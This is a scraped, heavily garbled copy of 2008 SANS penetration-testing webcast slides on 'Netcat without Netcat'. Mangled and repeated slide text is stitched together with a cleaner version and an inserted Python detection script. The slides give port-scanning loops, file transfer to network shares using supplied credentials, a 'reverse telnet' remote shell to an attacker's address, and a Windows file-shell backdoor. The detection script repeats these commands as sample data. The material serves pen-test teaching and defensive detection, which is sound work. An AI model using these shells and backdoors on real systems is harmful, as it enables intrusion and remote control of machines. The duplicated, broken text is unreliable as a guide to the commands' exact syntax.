Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using

FTP Clientbull Windows FTP client Cgt ftp [IPaddr]

bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21

bull Solution But you can specify dest port in an FTP

command file ndash open [IPaddr] [port]

bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]

bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file

displaying or storing results at each iteration

Th Wi d C d Li

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29

The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly

Making It Store Results

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34

Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt



Linux Command-Line Reverse Shell Backdoor In Action

(Screenshot slide)


Linux Command-Line Port Scanner

• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]

• Note that the "Connection refused" text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file

(Screenshot annotation: Port 80 is listening)


Storing Results and Iterating

• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed

• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done

• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers


Command-Line Port Scanner In Action

(Screenshot slide)


Linux Command-Line Backdoor via "Reverse Telnet"

• There's a whole different way we can get remote shell without using /dev/tcp

• Linux telnet clients let us redirect Standard In and Standard Out

• Gives rise to "Reverse telnet"

• On target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]

• Provide commands on attacker's machine via port1

• Receive output on attacker's machine on port2


Reverse Telnet Shell in Action


Windows

• Built-in command-line has very clunky syntax

• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out

• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows


Building Blocks: Windows FOR Loops

• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file

• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output

• See the first webcast in this series for details on how these work… we won't go through them again here


Windows Port Scanner Using Telnet Client

• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i

• Problem: When it finds an open port, it hangs

• How to address?
  – Watch it… When it stops, hit CTRL-[ and then type quit to resume
  – Or kill the telnet client every 5 seconds:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking


More Problems with Windows Telnet Client as a Port Scanner

• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include telnet client by default
    • But Netcat without Netcat is about living off the land

• There must be a better way!


Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]

• Problem: Can't specify port to connect to on the invocation command line… only connects to TCP port 21

• Solution: But you can specify dest port in an FTP command file
  – open [IPaddr] [port]

• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]

• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration


The Windows Command Line Port Scanner Using FTP Client

• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt

• Problem: It hangs for about 30 seconds on open port, then moves on
  – That's not so bad

• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly


Making It Store Results

• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt


Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard

• But we can use Windows file and print sharing on the command line, redirecting to shares

• C:\> type [filename] > \\[machine]\[share]\[filename]

• Will use current user credentials…

• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]

• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files


File Transfer in Action


Backdoors: The File Shell

• Now, let's do a backdoor

• Listening on a port is hard…

• But we can look in the file system

• A FOR loop can spin looking for a command in a file, run the command, and dump output to another file

• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1


Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt

• And we can read results by using type to read \\[IP_addr]\[share]\output.txt

• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
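The conclusions later in the deck ask defenders to recognise these moves, so here is an added example (not code from the webcast or from SANS) showing how a blue team might flag the Netcat-without-Netcat building blocks from the Linux and Windows slides above in process-creation command lines. The records, host names and addresses are constructed for the example, and the three-field (host, user, command line) layout is an assumption, not any real log product's format.

```python
import re
from typing import Dict, List, Tuple

# One loose regex per building block from the webcast (slides 20-33).
# Loose on purpose: spacing, case, port ranges and host names all vary.
PATTERNS = [
    # Linux: a shell loop driving bash's /dev/tcp pseudo-device (the slide 20 scanner)
    ("linux_devtcp_loop", re.compile(r"\b(while|for)\b.*/dev/tcp/", re.I)),
    # Linux: two telnet clients with a shell piped between them ("reverse telnet", slide 22)
    ("linux_reverse_telnet",
     re.compile(r"telnet\s+\S+\s+\d+\s*\|.*\|\s*telnet\s+\S+\s+\d+", re.I)),
    # Windows: FOR /L loop repeatedly killing telnet.exe with WMIC (slide 26)
    ("win_telnet_kill_loop",
     re.compile(r"for\s+/l\b.*wmic\s+process\s+where.*telnet\.exe.*\bdelete\b", re.I)),
    # Windows: FOR /L loop writing "open host port" for ftp -s: (slides 29-30)
    ("win_ftp_port_scan",
     re.compile(r"for\s+/l\b.*echo\s+open\s+\S+\s+%+\w.*ftp\s+-s:", re.I)),
    # Windows: output redirected straight into a UNC share (slide 31)
    ("win_redirect_to_share", re.compile(r">\s*\\\\[^\\\s]+\\[^\\\s]+\\")),
    # Windows: file shell, FOR /L spinning a FOR /F over a command file, ping as sleep (slide 33)
    ("win_file_shell",
     re.compile(r"for\s+/l\b.*for\s+/f\b.*cmd(\.exe)?\s+/c\s+%+\w"
                r".*ping\s+-n\s+\d+\s+127\.0\.0\.1", re.I)),
]

# Constructed process-creation records: (host, user, command line).
# Hosts and addresses are made up; the layout is an assumption for this example.
SAMPLE_RECORDS: List[Tuple[str, str, str]] = [
    ("srv-web01", "www-data",
     "port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/10.0.0.5/$port; "
     "[ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done"),
    ("srv-web01", "www-data", "telnet 198.51.100.7 80 | /bin/bash | telnet 198.51.100.7 443"),
    ("ws-fin12", "jsmith",
     'for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1'),
    ("ws-fin12", "jsmith",
     "for /L %i in (1,1,1024) do echo open 10.0.0.5 %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt"),
    ("ws-fin12", "jsmith", r"type report.txt > \\10.0.0.9\share\report.txt"),
    ("ws-fin12", "jsmith",
     'for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) '
     'do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1'),
    ("ws-fin12", "jsmith", "ping -n 4 10.0.0.1"),              # benign
    ("srv-web01", "root", "for f in *.log; do gzip $f; done"),  # benign loop
]


def classify(cmdline: str) -> List[str]:
    """Names of every Netcat-without-Netcat pattern that matches one command line."""
    return [name for name, rx in PATTERNS if rx.search(cmdline)]


def triage(records) -> Dict[str, List[Tuple[str, str]]]:
    """Group (user, pattern) hits per host; hosts with no hits are absent."""
    hits: Dict[str, List[Tuple[str, str]]] = {}
    for host, user, cmd in records:
        for tag in classify(cmd):
            hits.setdefault(host, []).append((user, tag))
    return hits


def chained_hosts(records, min_distinct: int = 2) -> List[str]:
    """Hosts on which at least `min_distinct` different building blocks appear.

    A single hit may be an admin one-liner; several distinct blocks on one box
    (scan, then transfer, then a file shell) look like the chain the webcast walks through.
    """
    hits = triage(records)
    return sorted(h for h, lst in hits.items() if len({t for _, t in lst}) >= min_distinct)


if __name__ == "__main__":
    for host, entries in triage(SAMPLE_RECORDS).items():
        for user, tag in entries:
            print(f"{host}\t{user}\t{tag}")
    print("chained:", chained_hosts(SAMPLE_RECORDS))
```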


The File Shell In Action


Outline

• Building a Penetration Test Infrastructure

• Netcat without Netcat

• Conclusions

• Q&A


Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box

• Defenders need to be able to interpret attackers' actions and anticipate their moves

• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects

• Netcat without Netcat serves these goals


Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking

• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20

• Discount applies to 560 course through August:
  – June 4-9: Las Vegas, NV: Skoudis
  – June 12-July 22: Home, On-Line: Skoudis
  – July 24-29: Wash DC: Skoudis
  – Aug 11-16: Boston: Shackleford
  – Aug 18-23: Minneapolis: Conrad
  – Aug 24-29: Va Beach: Strand

• Go to www.sans.org and look for "560" for details


Outline

• Why Penetration Testing?

• Windows Command Line Tips for Pen Testers

• Conclusions

• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008

Page 19: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19

Linux Command-Line Port

Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]

bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file

Port 80 is listening

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20

Storing Results and Iterating

bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed

bull For a port scanner we could use a while loop

that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==

0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done

bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for

pen testers

d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21

Command-Line Port Scanner

In Action

5 Not Closed

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22

Linux Command-Line

Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote

shell without using devtcpbull Linux telnet clients let us redirect Standard In and

Standard Out

bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |

binbash | telnet [attacker_IPaddr][port2]

bull Provide commands on attackerrsquos machine via port1

bull Receive output on attackerrsquos machine on port2

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23

Reverse Telnet Shell in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24

Windowsbull Built-in command-line has very clunky syntax

bull Also telnet and ftp clients are absolutelyatrocious

ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out

bull Thus we will build Netcat-without-Netcat

from some fundamental command-linebuilding blocks in Windows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25

Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using

FTP Clientbull Windows FTP client Cgt ftp [IPaddr]

bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21

bull Solution But you can specify dest port in an FTP

command file ndash open [IPaddr] [port]

bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]

bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file

displaying or storing results at each iteration

Th Wi d C d Li

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29

The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly

Making It Store Results

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34

Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt

bull And we can read results by using type to read[IP_addr][share]outputtxt

bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

ndash Or rely on nslookup to pull domain names that includecommands

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35

The File Shell In Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37

Conclusionsbull Netcat without Netcat shows that with only individual

command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38

Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39

Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008

Page 20: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20

Storing Results and Iterating

bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed

bull For a port scanner we could use a while loop

that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==

0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done

bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for

pen testers

d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21

Command-Line Port Scanner

In Action

5 Not Closed

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22

Linux Command-Line

Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote

shell without using devtcpbull Linux telnet clients let us redirect Standard In and

Standard Out

bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |

binbash | telnet [attacker_IPaddr][port2]

bull Provide commands on attackerrsquos machine via port1

bull Receive output on attackerrsquos machine on port2

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23

Reverse Telnet Shell in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24

Windowsbull Built-in command-line has very clunky syntax

bull Also telnet and ftp clients are absolutelyatrocious

ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out

bull Thus we will build Netcat-without-Netcat

from some fundamental command-linebuilding blocks in Windows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25

Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]
• Problem: you can't specify the port to connect to on the invocation command line… it only connects to TCP port 21.
• Solution: but you can specify the destination port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run the commands from that file, displaying or storing results at each iteration.


The Windows Command Line Port Scanner Using FTP Client

• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt

• Each iteration overwrites ftp.txt (single >) with an open line for the next port, appends quit, and runs the client against that file.
• Problem: it hangs for about 30 seconds on an open port, then moves on.
  – The client connects and then waits for an FTP greeting that a non-FTP service never sends; it only gives up when its own timeout expires.
  – That's not so bad.
• Another problem: it doesn't store results.
  – We can fix that, but it gets a little ugly.


Making It Store Results

• C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

• Each pass appends a "Checking Port N:" marker to ports.txt and then appends whatever the ftp client writes to Standard Error (2>>) for that port. A marker followed by a connect error is a closed or filtered port; a marker with nothing after it is a port that accepted the connection.
